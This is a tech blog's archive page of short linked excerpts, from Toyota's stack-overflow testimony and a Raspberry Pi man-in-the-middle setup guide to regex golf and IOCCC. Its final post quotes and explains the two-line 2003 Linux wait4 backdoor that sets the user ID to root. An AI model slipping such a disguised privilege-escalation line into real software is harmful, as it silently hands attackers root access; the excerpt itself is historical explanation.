Are We Shooting Ourselves in the Foot with Stack Overflow?

Posted on February 21, 2014 by mea

Unless you’ve been living under a rock for a past couple of years, you must have heard of the Toyota unintended acceleration (UA) cases, where Camry and other Toyota vehicles accelerated unexpectedly and some of them managed to kill people and all of them scared the hell out of their drivers.

The recent trial testimony delivered at the Oklahoma trial by an embedded guru Michael Barr for the fist time in history of these trials offers a glimpse into the Toyota throttle control software. In his deposition, Michael explains how a stack overflow could corrupt the critical variables of the operating system (OSEK in this case), because they were located in memory adjacent to the top of the stack. The following two slides from Michael’s testimony explain the memory layout around the stack and why stack overflow was likely in the Toyota code (see the complete set of Michael’s slides).

via Are We Shooting Ourselves in the Foot with Stack Overflow? « State Space.

Setting up a man-in-the-middle device with Raspberry Pi, Part 1

Posted on February 3, 2014 by mea

The regular install on a Raspberry Pi is NOOBS (new out-of-box software) and contains several pre-packaged operating systems. However for the purpose of our MITM device we’ll be using a different Linux distro for our Pi: PwnPi. PwnPi is a distribution of the Raspbian OS that contains many pre-installed packages for security and penetration testing which is naturally right up our alley. So, go ahead and download PwnPi. Once it’s downloaded we’ll need to load it onto our SD card. First, format your SD card using the SD card formatter from the SD association. If the “size” value shown in the formatter is less than the size of your card, be sure to choose “format size adjustment” in the card.

via Setting up a man-in-the-middle device with Raspberry Pi, Part 1 | jeffq, published.

Chicago Boss: The Erlang Web Framework

Posted on January 26, 2014 by mea

Do you pine for a simpler time when web pages loaded in under one second? Chicago Boss is the answer to slow server software: a Rails-like framework for Erlang that delivers web pages to your users as quickly and efficiently as possible.

via Chicago Boss: The Erlang Web Framework.

xkcd 1313: Regex Golf

Posted on January 12, 2014 by mea

I found that the hover text, “/bu|[rn]t|[coy]e|[mtg]a|j|iso|n[hl]|[ae]d|lev|sh|[lnd]i|[po]o|ls/ matches the last names of elected US presidents but not their opponents.“, contains a confusing contradiction. There are several last names (like “Nixon”) that denote both elected presidents and opponents. So no regular expression could both match and not match “Nixon”. I could only assume that Randall meant for these names to be winners and not losers (and in fact he later confirmed that was the correct interpretation).

So that got me thinking: can I come up with an algorithm to find a short regex that covers the winners and not the losers?

I started by finding a page that lists winners and losers of US presidential elections through 2000. Adding the 2004-2012 results I get: …

via xkcd 1313: Regex Golf

Apparently there is a Regex Golf game.

Type a regex in the box. You get ten points per correct match. Hit Enter to go to the next ‘level’.

Who won the 22nd IOCCC

Posted on January 5, 2014 by mea

Here are the names and categories for the winners of the 22nd IOCCC:

via Who won the 22nd IOCCC.

IOCCC=International Obfuscated C Code Contest

The source for all the entries should compile and run. I liked this one: Most catty

horizontal_cat concatenates files horizontally and write the output to stdout. Each input file is padded with spaces on the right so that the original text alignments are preserved.

How to block flash videos using Squid proxy Server

Posted on December 27, 2013 by mea

A popular request is to block certain content types from being served to clients. Squid currently can not do “content inspection” to decide on the file type based on the contents, but it is able to block HTTP replies based on the servers’ content MIME Type reply.

via How to block flash videos using Squid proxy Server | Linux Blog.

Should arrays start with 0 or 1?

Posted on November 15, 2013 by mea

“Should array indices start at 0 or 1? My compromise of 0.5 was rejected without, I thought, proper consideration.” — Stan Kelly-Bootle

via Citation Needed – blarg?.

Georgia Tech develops inkjet-based circuits at fraction of time and cost

Posted on November 9, 2013 by mea

Recent advances in chemically bonding metal particles allowed the researchers to use silver nanoparticle ink to print the circuits and avoid thermal bonding, or sintering, a time-consuming and potentially damaging technique due to the heat. Printing the circuits on resin-coated paper, PET film and glossy photo paper worked best. Researchers also made a list of materials to avoid, such as canvas cloths and magnet sheets.

via Georgia Tech develops inkjet-based circuits at fraction of time and cost.

From: Ink-Jet Printing Custom-Designed Micro Circuits

Initial reports of the technique, which the team demonstrated at a meeting of the Association for Computing Machinery in Zurich Sept. 10, described the result as a “paper computer,” though the best researchers could do was print a WiFi antenna, circuits for an LED and a 3D-printed flashlight. They also produced circuits containing microprocessors and memory-chip connectors that could potentially become components of an actual device, but the printing, ink and materials are still far too basic to allow that, according to Matt Johnson of conductive-ink manufacturer Bare Conductive, who was quoted in a New Scientist story about the demonstration.

Goodbye Sticky. Hello Ara.

Posted on October 29, 2013 by mea

The design for Project Ara consists of what we call an endoskeleton endo and modules. The endo is the structural frame that holds all the modules in place. A module can be anything, from a new application processor to a new display or keyboard, an extra battery, a pulse oximeter–or something not yet thought of!

via The Official Motorola Blog: Goodbye Sticky. Hello Ara..

The Linux Backdoor Attempt of 2003

Posted on October 9, 2013 by mea

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current -> uid == 0. Sneaky!

Bucktown Bell

Cut to the chase.

Category Archives: Development